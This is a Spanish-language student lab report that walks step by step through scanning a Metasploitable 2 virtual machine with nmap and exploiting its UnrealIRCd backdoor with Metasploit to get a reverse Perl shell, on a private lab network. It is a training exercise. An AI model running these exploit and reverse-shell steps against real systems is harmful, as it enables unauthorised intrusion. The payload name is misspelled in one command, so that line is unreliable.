Taller Metasploit - Metasploitable

Descargar como pdf o txt
Descargar como pdf o txt
Está en la página 1de 10

Andrés Esteban Peña Piarpusan, I044216

Taller Metasploit

Describir el proceso realizado para aplicar un exploit desde Metasploit 5 en Kali a una máquina virtual
Metasploitable 2.

1. Se inicia el servicio postgresql, requerido para el funcionamiento de Metasploit.

Systemctl start postgresql.service

2. Iniciar la consola de Metasploit


msfconsole

3. Revisar el estado de conexión con la base de datos.

db_status
Andrés Esteban Peña Piarpusan, I044216

4. Revisar los espacios de trabajo disponibles.

workspace

5. Crear un nuevo espacio de trabajo con el nombre ‘test’ y revisar que este esté activo.
workspace -a test

6. Revisar las direcciones IP de la máquina Kali y Metasploitable.

ifconfig
Andrés Esteban Peña Piarpusan, I044216

7. Realizar ping a Metasploit para revisar conexión.

ping 192.168.56.101

8. Obtener los puertos disponibles a través de nmap.


Andrés Esteban Peña Piarpusan, I044216

db_nmap -Pn 192.168.56.101

9. Revisar los servicios reconocidos.

10. Utilizar nmap para obtener la información de la versión de los diferentes servicios activos en la
máquina.

db_nmap -sV 192.168.56.101


Andrés Esteban Peña Piarpusan, I044216

11. Revisar las versiones de servicios reconocidos.


Andrés Esteban Peña Piarpusan, I044216

12. Realizar una búsqueda en la libreria de Metasploit para los posibles exploits disponibles para el
servicio UnrealIRCd en el puerto 6667.

search UnrealIRCD

13. Usar el exploit identificado.

use exploit/unix/irc/unreal_ircd_3281_backdoor

14. Mostrar la información requerida por el exploit.


Andrés Esteban Peña Piarpusan, I044216

info

15. Suministrar la dirección IP del objetivo como único parámetro requerido.

set RHOSTS 192.168.56.101

16. Mostrar la lista de payloads disponibles.

show payloads
Andrés Esteban Peña Piarpusan, I044216

17. Se escogió el payload ‘cmd/unix/reverse_perl’


set payload cmd/unix/reverse_perll

18. Mostrar la información requerida por el payload.


options

19. Suministrar la dirección IP local en LHOST.


Andrés Esteban Peña Piarpusan, I044216

set LHOST 192.168.56.102

20. Ejecutar el exploit.

21. Si el exploit fue exitoso, se creará una sesión del shell en la máquina objetivo.

22. Para comprobar el acceso, se realiza ping desde la máquina objetivo hacia la máquina local.
Andrés Esteban Peña Piarpusan, I044216

También podría gustarte